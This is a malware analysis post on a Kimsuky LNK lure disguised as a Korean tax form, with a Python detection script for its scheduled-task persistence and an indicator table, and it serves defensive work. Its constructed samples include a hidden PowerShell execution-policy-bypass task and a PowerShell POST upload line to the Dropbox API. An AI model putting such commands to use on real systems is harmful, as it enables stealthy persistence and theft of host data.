Malware Disguised as a Capital Gains Tax Base Return and Payment Calculation Form by North Korea's Kimsuky - out.lnk (2024.11.26)

2024-11-27 Sakai Malware by North Korea's Kimsuky Disguised as a Capital Gains Tax Base Return and Payment Calculation Form - out.lnk (2024.11.26)

https://wezard4u.tistory.com/429342


Kimsuky is linked to a Windows LNK payload disguised as a Korean capital gains tax base report and payment calculation PDF. The shortcut launches PowerShell, decodes embedded script content, downloads a decoy PDF and additional Dropbox-hosted scripts, and registers a hidden scheduled task named ChromeUpdateTaskMachineKOR to rerun chrome.ps1 every 30 minutes. Follow-on PowerShell collects host information such as IP address, OS details, boot time, installed antivirus products, and running processes, then uploads the results to Dropbox using OAuth and the content upload API. The excerpt provides the LNK hashes, Dropbox URLs and API endpoints, local AppData and Temp file paths, and the scheduled-task name for detection and response.
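The persistence and upload behaviour summarised above can be checked directly from exported Task Scheduler definitions and PowerShell command lines. The following is an added detection example, not code from the original post or from the analysis it summarises: it parses the standard Task Scheduler XML format, flags the task name, script name and 30-minute repeat interval the write-up reports, and adds a more general heuristic (a hidden task that repeatedly runs PowerShell from AppData or Temp) that goes beyond the specific sample. The task XML, the victim file path and the Dropbox request line are constructed placeholders; only the hostnames from the IoC table are used, since their paths are truncated there.

```python
"""Detection helpers for the scheduled-task persistence and Dropbox API use
described in the summary. Added example; all sample data below is constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Indicators stated in the write-up.
KNOWN_TASK_NAME = "ChromeUpdateTaskMachineKOR"
KNOWN_SCRIPT = "chrome.ps1"
KNOWN_INTERVAL_MIN = 30
# Hostnames visible in the IoC table (paths are truncated there, so host only).
DROPBOX_API_HOSTS = ("api.dropboxapi.com", "content.dropboxapi.com")


def interval_minutes(iso_duration):
    """Convert a Task Scheduler ISO-8601 duration such as PT30M to minutes (None if unparseable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso_duration or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def assess_task_xml(xml_text):
    """Return a list of findings for one exported scheduled-task definition."""
    root = ET.fromstring(xml_text)

    def text(path):
        node = root.find(path, NS)
        return (node.text or "").strip() if node is not None else ""

    name = text("t:RegistrationInfo/t:URI").lstrip("\\")
    hidden = text("t:Settings/t:Hidden").lower() == "true"
    cmdline = f'{text("t:Actions/t:Exec/t:Command")} {text("t:Actions/t:Exec/t:Arguments")}'.lower()
    intervals = [(n.text or "").strip() for n in root.findall(".//t:Repetition/t:Interval", NS)]

    findings = []
    if name == KNOWN_TASK_NAME:
        findings.append(f"task name matches known indicator {KNOWN_TASK_NAME}")
    if "powershell" in cmdline and KNOWN_SCRIPT in cmdline:
        findings.append(f"PowerShell action runs {KNOWN_SCRIPT}")
    # Generic heuristic (assumption, broader than the sample): a hidden task that
    # runs PowerShell from a user-writable directory on a tight repeat interval.
    user_writable = re.search(r"\\(appdata|temp)\\", cmdline) is not None
    minutes = [interval_minutes(i) for i in intervals]
    tight_repeat = any(m is not None and m <= KNOWN_INTERVAL_MIN for m in minutes)
    if hidden and "powershell" in cmdline and user_writable and tight_repeat:
        findings.append("hidden task repeatedly running PowerShell from a user-writable path")
    return findings


def dropbox_api_hosts_in(command_line):
    """Hostnames from the IoC table that appear in a command line or script body."""
    lower = command_line.lower()
    return [h for h in DROPBOX_API_HOSTS if h in lower]


# Constructed sample mirroring the described task; the file path is a placeholder.
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\ChromeUpdateTaskMachineKOR</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-11-26T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Users\\victim\\AppData\\Local\\Temp\\chrome.ps1</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign task for comparison.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Backup\\NightlySync</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-11-26T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions><Exec><Command>C:\\Program Files\\Backup\\sync.exe</Command></Exec></Actions>
</Task>
"""

# Constructed upload line; the real API path is truncated in the IoC table.
SAMPLE_UPLOAD_CMD = "Invoke-RestMethod -Method Post -Uri https://content.dropboxapi.com/PATH-ELIDED"

if __name__ == "__main__":
    for label, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, assess_task_xml(xml_text))
    print("dropbox hosts:", dropbox_api_hosts_in(SAMPLE_UPLOAD_CMD))
```

On a live host the XML can be obtained with `schtasks /Query /XML /TN <name>` or by reading the task files under `%SystemRoot%\System32\Tasks`; the heuristic branch is intentionally conservative (it needs the hidden flag, PowerShell, a user-writable path and a short repeat interval together) so that ordinary vendor updater tasks do not trip it.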

Indicators of Compromise

Type   Value                                  First Seen   Last Seen
URL    https://api.dropboxapi.com/oaut…       2023-12-29   2025-09-03
URL    https://content.dropboxapi.com/…       2018-09-21   2025-09-03
URL    https://dl.dropboxusercontent.c…       2024-11-27   2025-02-13
HASH   f5740e4027ad48231f199b18b8ae15a…       2024-11-27   2024-11-27
HASH   adcd2bcd43a6f495facfe31e71d4e2b8       2024-11-27   2024-11-27
HASH   4bdbf8733e178d50f1763d5999b58bb…       2024-11-27   2024-11-27
URL    https://dl.dropboxusercontent.c…       2024-11-27   2024-11-27
URL    https://dl.dropboxusercontent.c…       2024-11-27   2024-11-27
URL    https://dl.dropboxusercontent.c…       2024-11-27   2024-11-27
URL    https://dl.dropboxusercontent.c…       2024-11-27   2024-11-27
